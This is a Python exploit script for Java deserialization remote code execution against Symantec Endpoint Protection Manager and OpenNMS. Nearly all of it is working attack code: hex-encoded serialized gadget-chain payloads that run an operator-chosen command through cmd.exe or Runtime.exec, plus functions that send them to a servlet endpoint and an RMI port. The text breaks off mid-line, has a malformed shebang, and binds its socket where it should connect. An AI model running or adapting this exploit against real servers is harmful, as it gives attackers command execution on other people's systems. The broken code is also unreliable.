/bin/bash/env python3\r\n#\r\n# ____ _ _ _ \r\n# / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r\n# \\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r\n# ___) | __/ | | | (_| | | (_| | || (_) | | \r\n# |____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r\n#\r\n# By Nikhil Sreekumar (@roo7break)\r\n# Websphere/JBoss/OpenNMS/Symantec Endpoint Protection Manager - Java Deserialization Remote Code Execution\r\n \r\nimport sys\r\nimport base64\r\nimport httplib2\r\nimport socket\r\nimport argparse\r\nimport socket\r\nimport os\r\nimport struct\r\nimport ctypes\r\n \r\nversion = \"0.1\"\r\nbanner = \"\"\"\r\n ____ _ _ _ \r\n / ___| ___ _ __(_) __ _| | __ _| |_ ___ _ __ \r\n \\___ \\ / _ \\ '__| |/ _` | |/ _` | __/ _ \\| '__|\r\n ___) | __/ | | | (_| | | (_| | || (_) | | \r\n |____/ \\___|_| |_|\\__,_|_|\\__,_|\\__\\___/|_|\r\n by Nikhil Sreekumar (@roo7break) v %s\r\n \r\n\"\"\" % version\r\n \r\ndef hex2raw3(teststr):\r\n \"\"\"\r\n This function takes a string (expecting hexstring) and returns byte string\r\n \"\"\"\r\n # From: HexToByte() at http://code.activestate.com/recipes/510399-byte-to-hex-and-hex-to-byte-string-conversion/\r\n bytes = []\r\n teststr = ''.join( teststr.split(\" \") )\r\n for i in range(0, len(teststr), 2):\r\n bytes.append( chr( int (teststr[i:i+2], 16 ) ) )\r\n return \"\".join(bytes)\r\n \r\ndef symantec_endpoint_attack(HOST, PORT, SSL_On, _cmd):\r\n # The below code is based on the symantec_endpoint_prot_mgr_2015_6554.nasl script within Nessus\r\n \"\"\"\r\n This function sets up the attack payload for Symantec Endpoint\r\n \"\"\"\r\n \r\n java_payload = 
'\\xac\\xed\\x00\\x05\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x78\\x70\\x73\\x71\\x00\\x7e\\x00\\x00\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x7
2\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x04\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x78\\x70\\x76\\x72\\x00\\x25\\x63\\x6f\\x6d\\x2e\\x73\\x79\\x67\\x61\\x74\\x65\\x2e\\x73\\x63\\x6d\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x52\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5
b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x78\\x70\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0e\\x72\\x75\\x6e\\x43\\x6f\\x6d\\x6d\\x61\\x6e\\x64\\x4c\\x69\\x6e\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x76\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x78\\x70\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1e\\x73\\x71\\x00\\x7e\\x00\\x16\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x1b\\x00\\x00\\x00\\x01\\x75\\x71\\x00\\x7e\\x00\\x20\\x00\\x00\\x00\\x03\\x74\\x00\\x07\\x63\\x6d\\x64\\x2e\\x65\\x78\\x65\\x74\\x00\\x02\\x2f\\x63\\x74\\x00'\r\n \r\n cleng = len(_cmd)\r\n java_payload += chr(cleng) + _cmd\r\n java_payload += 
'\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x1e\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x1b\\x73\\x71\\x00\\x7e\\x00\\x11\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x78\\x70\\x71\\x00\\x7e\\x00\\x3a'\r\n \r\n fullpayload = \"\"\"------=_Part_0_992568364.1449677528532\r\nContent-Type: application/binary\r\nContent-Disposition: form-data; name=\"Content\"\r\n \r\n%s \r\n \r\n------=_Part_0_992568364.1449677528532--\r\n\"\"\" % java_payload\r\n \r\n if SSL_On:\r\n webservice = httplib2.Http(disable_ssl_certificate_validation=True)\r\n URL_ADDR = \"%s://%s:%s\" % ('https',HOST,PORT)\r\n else:\r\n webservice = httplib2.Http()\r\n URL_ADDR = \"%s://%s:%s\" % ('http',HOST,PORT)\r\n \r\n headers = {\"User-Agent\":\"Symantec_RCE_POC\",\r\n \"Content-type\":\"multipart/form-data;\",\r\n \"boundary\":\"----=_Part_0_992568364.1449677528532\",\r\n \"Accept\":\"text/html, image/gif, image/jpeg, *; 
q=.2, */*; q=.2\\r\\n\",\r\n \"Connection\":\"keep-alive\",\r\n \"Content-length\":\"%d\" % len(fullpayload)\r\n }\r\n resp, content = webservice.request(URL_ADDR+\"/servlet/ConsoleServlet?ActionType=SendStatPing\", \"POST\", body=fullpayload, headers=headers)\r\n # print provided response.\r\n print(\"[i] Response received from target: %s\" % resp)\r\n \r\ndef opennms_attack(HOST, PORT, _cmd):\r\n # The below code is based on the opennms_java_serialize.nasl script within Nessus\r\n \"\"\"\r\n This function sets up the attack payload for OpenNMS\r\n \"\"\"\r\n clen = len(_cmd)\r\n d1 = '\\x4a\\x52\\x4d\\x49\\x00\\x02\\x4b'\r\n d2 = '\\x00\\x09\\x31\\x32\\x37\\x2e\\x30\\x2e\\x31\\x2e\\x31\\x00\\x00\\x00\\x00\\x50\\xac\\xed\\x00\\x05\\x77\\x22\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x44\\x15\\x4d\\xc9\\xd4\\xe6\\x3b\\xdf\\x74\\x00\\x05\\x70\\x77\\x6e\\x65\\x64\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0f\\x6a\\x61\\x76\\x61\\x2e\\x72\\x6d\\x69\\x2e\\x52\\x65\\x6d\\x6f\\x74\\x65\\x70\\x78\\x72\\x00\\x17\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x50\\x72\\x6f\\x78\\x79\\xe1\\x27\\xda\\x20\\xcc\\x10\\x43\\xcb\\x02\\x00\\x01\\x4c\\x00\\x01\\x68\\x74\\x00\\x25\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2f\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x32\\x73\\x75\\x6e\\x2e\\x72\\x65\\x66\\x6c\\x65\\x63\\x74\\x2e\\x61\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x2e\\x41\\x6e\\x6e\\x6f\\x74\\x61\\x74\\x69\\x6f\\x6e\\x49\\x6e\\x76\\x6f\\x63\\x61\\x74\\x69\\x6f\\x6e\\x48\\x61\\x6e\\x64\\x6c\\x65\\x72\\x55\\xca\\xf5\\x0f\\x15\\xcb\\x7e\\xa5\\x02\\x00\\x02\\x4c\\x00\\x0c\\x6d\\x65\\x6d\\x62\\x65\\x72\\x56\\x61\\x6c\\x75\\x65\\x73\\x74\\x00\\x0f\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x75\\x74\\x69\\x6c\\x2f\\x4d\\x61\\x70\\x3b\\x4
c\\x00\\x04\\x74\\x79\\x70\\x65\\x74\\x00\\x11\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x48\\x61\\x73\\x68\\x4d\\x61\\x70\\x05\\x07\\xda\\xc1\\xc3\\x16\\x60\\xd1\\x03\\x00\\x02\\x46\\x00\\x0a\\x6c\\x6f\\x61\\x64\\x46\\x61\\x63\\x74\\x6f\\x72\\x49\\x00\\x09\\x74\\x68\\x72\\x65\\x73\\x68\\x6f\\x6c\\x64\\x70\\x78\\x70\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x0c\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x00\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x7d\\x00\\x00\\x00\\x01\\x00\\x0d\\x6a\\x61\\x76\\x61\\x2e\\x75\\x74\\x69\\x6c\\x2e\\x4d\\x61\\x70\\x70\\x78\\x71\\x00\\x7e\\x00\\x02\\x73\\x71\\x00\\x7e\\x00\\x05\\x73\\x72\\x00\\x2a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x6d\\x61\\x70\\x2e\\x4c\\x61\\x7a\\x79\\x4d\\x61\\x70\\x6e\\xe5\\x94\\x82\\x9e\\x79\\x10\\x94\\x03\\x00\\x01\\x4c\\x00\\x07\\x66\\x61\\x63\\x74\\x6f\\x72\\x79\\x74\\x00\\x2c\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x68\\x61\\x69\\x6e\\x65\\x64\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x30\\xc7\\x97\\xec\\x28\\x7a\\x97\\x04\\x02\\x00\\x01\\x5b\\x00\\x0d\\x69\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x73\\x74\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2f\\x61\\x70\\x61\\x63\\x68\\x65\\x2f\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2f\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2f\\x54\\x72\\x61\\x6e\\x73\\x6
6\\x6f\\x72\\x6d\\x65\\x72\\x3b\\x70\\x78\\x70\\x75\\x72\\x00\\x2d\\x5b\\x4c\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x3b\\xbd\\x56\\x2a\\xf1\\xd8\\x34\\x18\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x05\\x73\\x72\\x00\\x3b\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x58\\x76\\x90\\x11\\x41\\x02\\xb1\\x94\\x02\\x00\\x01\\x4c\\x00\\x09\\x69\\x43\\x6f\\x6e\\x73\\x74\\x61\\x6e\\x74\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x70\\x78\\x70\\x76\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x73\\x72\\x00\\x3a\\x6f\\x72\\x67\\x2e\\x61\\x70\\x61\\x63\\x68\\x65\\x2e\\x63\\x6f\\x6d\\x6d\\x6f\\x6e\\x73\\x2e\\x63\\x6f\\x6c\\x6c\\x65\\x63\\x74\\x69\\x6f\\x6e\\x73\\x2e\\x66\\x75\\x6e\\x63\\x74\\x6f\\x72\\x73\\x2e\\x49\\x6e\\x76\\x6f\\x6b\\x65\\x72\\x54\\x72\\x61\\x6e\\x73\\x66\\x6f\\x72\\x6d\\x65\\x72\\x87\\xe8\\xff\\x6b\\x7b\\x7c\\xce\\x38\\x02\\x00\\x03\\x5b\\x00\\x05\\x69\\x41\\x72\\x67\\x73\\x74\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x4c\\x00\\x0b\\x69\\x4d\\x65\\x74\\x68\\x6f\\x64\\x4e\\x61\\x6d\\x65\\x74\\x00\\x12\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\x5b\\x00\\x0b\\x69\\x50\\x61\\x72\\x61\\x6d\\x54\\x79\\x70\\x65\\x73\\x74\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2f\\x6c\\x61\\x6e\\x67\\x2f\\x43\\x6c\\x61\\x73\\x73\\x3b\\x70\\x78\\x70\\x75\\x72\\x0
0\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x3b\\x90\\xce\\x58\\x9f\\x10\\x73\\x29\\x6c\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x02\\x74\\x00\\x0a\\x67\\x65\\x74\\x52\\x75\\x6e\\x74\\x69\\x6d\\x65\\x75\\x72\\x00\\x12\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x43\\x6c\\x61\\x73\\x73\\x3b\\xab\\x16\\xd7\\xae\\xcb\\xcd\\x5a\\x99\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x00\\x74\\x00\\x09\\x67\\x65\\x74\\x4d\\x65\\x74\\x68\\x6f\\x64\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\xa0\\xf0\\xa4\\x38\\x7a\\x3b\\xb3\\x42\\x02\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x24\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x02\\x70\\x75\\x71\\x00\\x7e\\x00\\x21\\x00\\x00\\x00\\x00\\x74\\x00\\x06\\x69\\x6e\\x76\\x6f\\x6b\\x65\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x02\\x76\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x62\\x6a\\x65\\x63\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x76\\x71\\x00\\x7e\\x00\\x21\\x73\\x71\\x00\\x7e\\x00\\x1c\\x75\\x72\\x00\\x13\\x5b\\x4c\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x53\\x74\\x72\\x69\\x6e\\x67\\x3b\\xad\\xd2\\x56\\xe7\\xe9\\x1d\\x7b\\x47\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x74'\r\n d2 += '\\x00' + chr(clen)\r\n d2 += _cmd\r\n d2 += 
'\\x74\\x00\\x04\\x65\\x78\\x65\\x63\\x75\\x71\\x00\\x7e\\x00\\x24\\x00\\x00\\x00\\x01\\x71\\x00\\x7e\\x00\\x29\\x73\\x71\\x00\\x7e\\x00\\x17\\x73\\x72\\x00\\x11\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x49\\x6e\\x74\\x65\\x67\\x65\\x72\\x12\\xe2\\xa0\\xa4\\xf7\\x81\\x87\\x38\\x02\\x00\\x01\\x49\\x00\\x05\\x76\\x61\\x6c\\x75\\x65\\x70\\x78\\x72\\x00\\x10\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4e\\x75\\x6d\\x62\\x65\\x72\\x86\\xac\\x95\\x1d\\x0b\\x94\\xe0\\x8b\\x02\\x00\\x00\\x70\\x78\\x70\\x00\\x00\\x00\\x01\\x73\\x71\\x00\\x7e\\x00\\x09\\x3f\\x40\\x00\\x00\\x00\\x00\\x00\\x10\\x77\\x08\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x78\\x78\\x76\\x72\\x00\\x12\\x6a\\x61\\x76\\x61\\x2e\\x6c\\x61\\x6e\\x67\\x2e\\x4f\\x76\\x65\\x72\\x72\\x69\\x64\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x70\\x78\\x70\\x71\\x00\\x7e\\x00\\x3f\\x78\\x71\\x00\\x7e\\x00\\x3f'\r\n \r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((HOST, PORT))\r\n print(\"[i] Sending initial packets to OpenNMS RMI service\")\r\n s.sendall(d1)\r\n retdata = s.recv(8192)\r\n if retdata:\r\n #\r\n # We have received some data suggesting the OpenNMS RMI Registry has responded.\r\n # Time to exploit.\r\n #\r\n print(\"[+] OpenNMS RMI service responded. Sending the exploit code...\")\r\n s.sendall(d2)\r\n else:\r\n print(\"[-] Sorry, the RMI service didnt respond. 
